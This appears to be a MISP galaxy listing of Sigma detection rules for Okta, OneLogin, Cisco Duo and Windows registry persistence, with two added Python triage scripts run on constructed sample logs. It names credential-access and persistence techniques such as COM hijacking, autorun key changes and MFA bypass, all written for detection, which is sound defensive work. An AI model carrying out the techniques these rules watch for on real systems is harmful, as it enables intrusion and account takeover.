Sigma-Rules
MISP galaxy cluster based on Sigma Rules.
Authors
| Authors and/or Contributors |
|---|
| @Joseliyo_Jstnk |
OneLogin User Assumed Another User
Detects when a user assumes another user account.
Internal MISP references
UUID 62fff148-278d-497e-8ecd-ad6083231a35 which can be used as unique global reference for OneLogin User Assumed Another User in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-10-12 |
| falsepositive | ['Unknown'] |
| filename | onelogin_assumed_another_user.yml |
| level | low |
| logsource.category | No established category |
| logsource.product | onelogin |
| tags | ['attack.impact'] |
OneLogin User Account Locked
Detects when a user account is locked or suspended.
Internal MISP references
UUID a717c561-d117-437e-b2d9-0118a7035d01 which can be used as unique global reference for OneLogin User Account Locked in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-10-12 |
| falsepositive | ['System may lock or suspend user accounts.'] |
| filename | onelogin_user_account_locked.yml |
| level | low |
| logsource.category | No established category |
| logsource.product | onelogin |
| tags | ['attack.impact'] |
Okta Policy Rule Modified or Deleted
Detects when a policy rule is modified or deleted.
Internal MISP references
UUID 0c97c1d3-4057-45c9-b148-1de94b631931 which can be used as unique global reference for Okta Policy Rule Modified or Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_policy_rule_modified_or_deleted.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta Identity Provider Created
Detects when a new identity provider is created for Okta.
Internal MISP references
UUID 969c7590-8c19-4797-8c1b-23155de6e7ac which can be used as unique global reference for Okta Identity Provider Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | kelnage |
| creation_date | 2023-09-07 |
| falsepositive | ['When an admin creates a new, authorised identity provider.'] |
| filename | okta_identity_provider_created.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098.001'] |
Okta Admin Role Assigned to an User or Group
Detects when the Administrator role is assigned to a user or group.
Internal MISP references
UUID 413d4a81-6c98-4479-9863-014785fd579c which can be used as unique global reference for Okta Admin Role Assigned to an User or Group in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Administrator roles could be assigned to users or group by other admin users.'] |
| filename | okta_admin_role_assigned_to_user_or_group.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098.003'] |
Okta Admin Functions Access Through Proxy
Detects access to Okta admin functions through a proxy.
Internal MISP references
UUID 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309 which can be used as unique global reference for Okta Admin Functions Access Through Proxy in MISP communities and other software using the MISP galaxy
External references
- https://dataconomy.com/2023/10/23/okta-data-breach/ - webarchive
- https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/ - webarchive
- https://www.beyondtrust.com/blog/entry/okta-support-unit-breach - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_admin_activity_from_proxy_query.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Muhammad Faisal @faisalusuf |
| creation_date | 2023-10-25 |
| falsepositive | ['False positives are expected if administrators access these functions through a proxy legitimately. Apply additional filters if necessary'] |
| filename | okta_admin_activity_from_proxy_query.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.credential-access'] |
New Okta User Created
Detects new user account creation
Internal MISP references
UUID b6c718dd-8f53-4b9f-98d8-93fdca966969 which can be used as unique global reference for New Okta User Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-10-25 |
| falsepositive | ['Legitimate and authorized user creation'] |
| filename | okta_user_created.yml |
| level | informational |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.credential-access'] |
Potential Okta Password in AlternateID Field
Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.
Internal MISP references
UUID 91b76b84-8589-47aa-9605-c837583b82a9 which can be used as unique global reference for Potential Okta Password in AlternateID Field in MISP communities and other software using the MISP galaxy
External references
- https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data - webarchive
- https://developer.okta.com/docs/reference/api/system-log/ - webarchive
- https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_password_in_alternateid_field.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | kelnage |
| creation_date | 2023-04-03 |
| falsepositive | ['Unlikely'] |
| filename | okta_password_in_alternateid_field.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.credential-access', 'attack.t1552'] |
Okta Application Modified or Deleted
Detects when an application is modified or deleted.
Internal MISP references
UUID 7899144b-e416-4c28-b0b5-ab8f9e0a541d which can be used as unique global reference for Okta Application Modified or Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_application_modified_or_deleted.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta API Token Revoked
Detects when an API token is revoked.
Internal MISP references
UUID cf1dbc6b-6205-41b4-9b88-a83980d2255b which can be used as unique global reference for Okta API Token Revoked in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_api_token_revoked.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta Suspicious Activity Reported by End-user
Detects when an Okta end-user reports activity by their account as being potentially suspicious.
Internal MISP references
UUID 07e97cc6-aed1-43ae-9081-b3470d2367f1 which can be used as unique global reference for Okta Suspicious Activity Reported by End-user in MISP communities and other software using the MISP galaxy
External references
- https://developer.okta.com/docs/reference/api/system-log/ - webarchive
- https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_suspicious_activity_enduser_report.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | kelnage |
| creation_date | 2023-09-07 |
| falsepositive | ['If an end-user incorrectly identifies normal activity as suspicious.'] |
| filename | okta_suspicious_activity_enduser_report.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.resource-development', 'attack.t1586.003'] |
Okta Security Threat Detected
Detects when Okta reports a security threat.
Internal MISP references
UUID 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 which can be used as unique global reference for Okta Security Threat Detected in MISP communities and other software using the MISP galaxy
External references
- https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm - webarchive
- https://developer.okta.com/docs/reference/api/event-types/ - webarchive
- https://developer.okta.com/docs/reference/api/system-log/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_security_threat_detected.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_security_threat_detected.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.command-and-control'] |
Okta Application Sign-On Policy Modified or Deleted
Detects when an application Sign-on Policy is modified or deleted.
Internal MISP references
UUID 8f668cc4-c18e-45fe-ad00-624a981cf88a which can be used as unique global reference for Okta Application Sign-On Policy Modified or Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_application_sign_on_policy_modified_or_deleted.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta API Token Created
Detects when an API token is created.
Internal MISP references
UUID 19951c21-229d-4ccb-8774-b993c3ff3c5c which can be used as unique global reference for Okta API Token Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Legitimate creation of an API token by authorized users'] |
| filename | okta_api_token_created.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.persistence'] |
Okta User Account Locked Out
Detects when a user account is locked out.
Internal MISP references
UUID 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a which can be used as unique global reference for Okta User Account Locked Out in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_user_account_locked_out.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact', 'attack.t1531'] |
Okta Network Zone Deactivated or Deleted
Detects when a network zone is deactivated or deleted.
Internal MISP references
UUID 9f308120-69ed-4506-abde-ac6da81f4310 which can be used as unique global reference for Okta Network Zone Deactivated or Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Unknown'] |
| filename | okta_network_zone_deactivated_or_deleted.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta New Admin Console Behaviours
Detects when Okta identifies new activity in the Admin Console.
Internal MISP references
UUID a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9 which can be used as unique global reference for Okta New Admin Console Behaviours in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | kelnage |
| creation_date | 2023-09-07 |
| falsepositive | ["When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual."] |
| filename | okta_new_behaviours_admin_console.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.initial-access', 'attack.t1078.004'] |
Okta FastPass Phishing Detection
Detects when Okta FastPass blocks an authentication attempt originating from a known phishing site.
Internal MISP references
UUID ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e which can be used as unique global reference for Okta FastPass Phishing Detection in MISP communities and other software using the MISP galaxy
External references
- https://sec.okta.com/fastpassphishingdetection - webarchive
- https://developer.okta.com/docs/reference/api/event-types/ - webarchive
- https://developer.okta.com/docs/reference/api/system-log/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_fastpass_phishing_detection.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2023-05-07 |
| falsepositive | ['Unlikely'] |
| filename | okta_fastpass_phishing_detection.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.initial-access', 'attack.t1566'] |
Okta Admin Role Assignment Created
Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence.
Internal MISP references
UUID 139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c which can be used as unique global reference for Okta Admin Role Assignment Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Khalimonenkov |
| creation_date | 2023-01-19 |
| falsepositive | ['Legitimate creation of a new admin role assignment'] |
| filename | okta_admin_role_assignment_created.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.persistence'] |
Okta Unauthorized Access to App
Detects when unauthorized access to an app occurs.
Internal MISP references
UUID 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 which can be used as unique global reference for Okta Unauthorized Access to App in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['User might have believed that they had access.'] |
| filename | okta_unauthorized_access_to_app.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta Policy Modified or Deleted
Detects when an Okta policy is modified or deleted.
Internal MISP references
UUID 1667a172-ed4c-463c-9969-efd92195319a which can be used as unique global reference for Okta Policy Modified or Deleted in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-12 |
| falsepositive | ['Okta Policies being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.'] |
| filename | okta_policy_modified_or_deleted.yml |
| level | low |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.impact'] |
Okta MFA Reset or Deactivated
Detects an attempt to deactivate or reset MFA.
Internal MISP references
UUID 50e068d7-1e6b-4054-87e5-0a592c40c7e0 which can be used as unique global reference for Okta MFA Reset or Deactivated in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Austin Songer @austinsonger |
| creation_date | 2021-09-21 |
| falsepositive | ['If a MFA reset or deactivated was performed by a system administrator.'] |
| filename | okta_mfa_reset_or_deactivated.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.persistence', 'attack.credential-access', 'attack.defense-evasion', 'attack.t1556.006'] |
Okta User Session Start Via An Anonymising Proxy Service
Detects when an Okta user session starts where the user is behind an anonymising proxy service.
Internal MISP references
UUID bde30855-5c53-4c18-ae90-1ff79ebc9578 which can be used as unique global reference for Okta User Session Start Via An Anonymising Proxy Service in MISP communities and other software using the MISP galaxy
External references
- https://developer.okta.com/docs/reference/api/system-log/ - webarchive
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/identity/okta/okta_user_session_start_via_anonymised_proxy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | kelnage |
| creation_date | 2023-09-07 |
| falsepositive | ['If a user requires an anonymising proxy due to valid justifications.'] |
| filename | okta_user_session_start_via_anonymised_proxy.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | okta |
| tags | ['attack.defense-evasion', 'attack.t1562.006'] |
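Two of the Okta rules above, "Potential Okta Password in AlternateID Field" and "Okta User Session Start Via An Anonymising Proxy Service", lend themselves to a quick triage over exported System Log events. The following is an added example written for this page, not the Sigma rules' own detection logic and not Okta's code. The field names (eventType, actor.alternateId, outcome.result, securityContext.isProxy) follow the Okta System Log schema; the "username must look like an email address" heuristic, the restriction to failed sign-ins, and the sample events are assumptions constructed for the example.

```python
"""Triage of Okta System Log events for two of the rules listed above.

Added example, not the Sigma rules' own logic. The email-shape heuristic,
the failed-sign-in restriction and the sample events are assumptions.
"""
import re

# Okta usernames are normally email-shaped. Anything else in the username
# field (actor.alternateId) on a failed sign-in may be a password typed into
# the wrong box, which the System Log then retains in clear text.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def password_in_alternate_id(event: dict) -> bool:
    """True when a failed session start carries a non-email username."""
    if event.get("eventType") != "user.session.start":
        return False
    if event.get("outcome", {}).get("result") != "FAILURE":
        return False
    alt = event.get("actor", {}).get("alternateId", "")
    return bool(alt) and not EMAIL_RE.match(alt)


def session_via_proxy(event: dict) -> bool:
    """True when a successful session start came through an anonymising proxy."""
    return (
        event.get("eventType") == "user.session.start"
        and event.get("outcome", {}).get("result") == "SUCCESS"
        and event.get("securityContext", {}).get("isProxy") is True
    )


def redact_alternate_id(event: dict) -> dict:
    """Copy of the event with the suspect username masked before forwarding."""
    out = {**event, "actor": {**event.get("actor", {})}}
    out["actor"]["alternateId"] = "<redacted>"
    return out


def triage(events) -> dict:
    """Map each flagged event's uuid to the names of the rules it matched."""
    hits = {}
    for ev in events:
        matched = []
        if password_in_alternate_id(ev):
            matched.append("Potential Okta Password in AlternateID Field")
        if session_via_proxy(ev):
            matched.append("Okta User Session Start Via An Anonymising Proxy Service")
        if matched:
            hits[ev["uuid"]] = matched
    return hits


# Constructed sample events (not real Okta data).
SAMPLE_EVENTS = [
    {"uuid": "e1", "eventType": "user.session.start",
     "actor": {"alternateId": "alice@example.com"},
     "outcome": {"result": "SUCCESS"},
     "securityContext": {"isProxy": False}},
    {"uuid": "e2", "eventType": "user.session.start",
     "actor": {"alternateId": "Winter2024!"},   # a password typed as the username
     "outcome": {"result": "FAILURE"},
     "securityContext": {"isProxy": False}},
    {"uuid": "e3", "eventType": "user.session.start",
     "actor": {"alternateId": "bob@example.com"},
     "outcome": {"result": "SUCCESS"},
     "securityContext": {"isProxy": True}},
    {"uuid": "e4", "eventType": "user.account.lock",
     "actor": {"alternateId": "carol@example.com"},
     "outcome": {"result": "SUCCESS"}},
]

if __name__ == "__main__":
    for uuid, rules in triage(SAMPLE_EVENTS).items():
        print(uuid, rules)
```

When the alternateId hit fires, the event itself is now a credential leak; redact the field (as `redact_alternate_id` does) before the record is copied into tickets or a second log store, and treat it as a password reset trigger rather than only an alert.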
Cisco Duo Successful MFA Authentication Via Bypass Code
Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
Internal MISP references
UUID 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8 which can be used as unique global reference for Cisco Duo Successful MFA Authentication Via Bypass Code in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nikita Khalimonenkov |
| creation_date | 2024-04-17 |
| falsepositive | ['Legitimate user that was assigned on purpose to a bypass group'] |
| filename | cisco_duo_mfa_bypass_via_bypass_code.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | cisco |
| tags | ['attack.credential-access', 'attack.defense-evasion', 'attack.initial-access'] |
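The bypass-code description above is a good candidate for a detection that also handles the stated false positive (a user deliberately placed in a bypass group). Below is an added example written for this page, not the Sigma rule's own logic and not Cisco's code. The record shape (result, reason, factor, user.name, application.name, timestamp) follows the Duo Admin API v2 authentication log as the author of this example understands it; the factor value "bypass_code", the allowlist of expected break-glass users, the one-hour repeat window and the sample records are assumptions.

```python
"""Successful Duo MFA via bypass code, evaluated over constructed records.

Added example, not the Sigma rule's own logic. The "bypass_code" factor
value, the allowlist, the repeat window and the sample data are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Users whose bypass-code use is expected (a documented break-glass account,
# say). Constructed allowlist; everything else is reported.
EXPECTED_BYPASS_USERS = {"breakglass.admin"}


def is_bypass_code_success(record: dict) -> bool:
    """A successful authentication whose second factor was a bypass code."""
    return record.get("result") == "success" and record.get("factor") == "bypass_code"


def find_bypass_code_logins(records, window=timedelta(hours=1)):
    """Return ({user: [applications]}, {users with repeated use inside window}).

    Repeated bypass-code use by one account in a short period is the more
    suspicious shape: a legitimate "lost my phone" case is normally one login.
    """
    by_user = defaultdict(list)
    for r in records:
        if not is_bypass_code_success(r):
            continue
        user = r["user"]["name"]
        if user in EXPECTED_BYPASS_USERS:
            continue
        ts = datetime.fromtimestamp(r["timestamp"], tz=timezone.utc)
        by_user[user].append((ts, r["application"]["name"]))

    findings, repeated = {}, set()
    for user, uses in by_user.items():
        uses.sort()
        findings[user] = [app for _, app in uses]
        for (t1, _), (t2, _) in zip(uses, uses[1:]):
            if t2 - t1 <= window:
                repeated.add(user)
    return findings, repeated


T0 = 1_713_340_800  # 2024-04-17T08:00:00Z, constructed base time

# Constructed sample records (not real Duo data).
SAMPLE_RECORDS = [
    {"timestamp": T0, "result": "success", "reason": "user_approved",
     "factor": "duo_push", "user": {"name": "alice"},
     "application": {"name": "VPN"}},
    {"timestamp": T0 + 60, "result": "success", "reason": "valid_passcode",
     "factor": "bypass_code", "user": {"name": "bob"},
     "application": {"name": "VPN"}},
    {"timestamp": T0 + 900, "result": "success", "reason": "valid_passcode",
     "factor": "bypass_code", "user": {"name": "bob"},
     "application": {"name": "Admin Panel"}},
    {"timestamp": T0 + 120, "result": "denied", "reason": "invalid_passcode",
     "factor": "bypass_code", "user": {"name": "mallory"},
     "application": {"name": "VPN"}},
    {"timestamp": T0 + 180, "result": "success", "reason": "valid_passcode",
     "factor": "bypass_code", "user": {"name": "breakglass.admin"},
     "application": {"name": "Admin Panel"}},
]

if __name__ == "__main__":
    findings, repeated = find_bypass_code_logins(SAMPLE_RECORDS)
    for user, apps in findings.items():
        flag = " (repeated)" if user in repeated else ""
        print(f"{user}: {apps}{flag}")
```

Denied attempts with a bypass code (mallory above) are deliberately left out of the success finding, but a run of them against one account is worth its own alert: bypass codes are short, and a guessing attempt looks exactly like that.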
CurrentVersion Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd which can be used as unique global reference for CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_currentversion.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
COM Hijacking via TreatAs
Detects modification of the TreatAs key to enable a "rundll32.exe -sta" command.
Internal MISP references
UUID dc5c24af-6995-49b2-86eb-a9ff62199e82 which can be used as unique global reference for COM Hijacking via TreatAs in MISP communities and other software using the MISP galaxy
External references
- https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-28 |
| falsepositive | ['Legitimate use'] |
| filename | registry_set_treatas_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015'] |
Potential Registry Persistence Attempt Via DbgManagedDebugger
Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the configured debugger is invoked when a managed application crashes.
Internal MISP references
UUID 9827ae57-3802-418f-994b-d5ecf5cd974b which can be used as unique global reference for Potential Registry Persistence Attempt Via DbgManagedDebugger in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-07 |
| falsepositive | ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines'] |
| filename | registry_set_dbgmanageddebugger_persistence.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.persistence', 'attack.t1574'] |
Potential Attachment Manager Settings Attachments Tamper
Detects tampering with the Attachment Manager policy settings (the Policies\Attachments registry values; see the reference for more information).
Internal MISP references
UUID ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a which can be used as unique global reference for Potential Attachment Manager Settings Attachments Tamper in MISP communities and other software using the MISP galaxy
External references
- https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - webarchive
- https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-01 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_policies_attachments_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Enabling COR Profiler Environment Variables
Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Internal MISP references
UUID ad89044a-8f49-4673-9a55-cbd88a1b374f which can be used as unique global reference for Enabling COR Profiler Environment Variables in MISP communities and other software using the MISP galaxy
External references
- https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors - webarchive
- https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling - webarchive
- https://www.sans.org/cyber-security-summit/archives - webarchive
- https://twitter.com/jamieantisocial/status/1304520651248668673 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) |
| creation_date | 2020-09-10 |
| falsepositive | No established falsepositives |
| filename | registry_set_enabling_cor_profiler_env_variables.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.012'] |
System Scripts Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 which can be used as unique global reference for System Scripts Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_system_scripts.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Outlook Security Settings Updated - Registry
Detects changes to the registry values related to outlook security settings
Internal MISP references
UUID c3cefdf4-6703-4e1c-bad8-bf422fc5015a which can be used as unique global reference for Outlook Security Settings Updated - Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md - webarchive
- https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-28 |
| falsepositive | ['Administrative activity'] |
| filename | registry_set_office_outlook_security_settings.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137'] |
Wow6432Node CurrentVersion Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID b29aed60-ebd1-442b-9cb5-16a1d0324adb which can be used as unique global reference for Wow6432Node CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
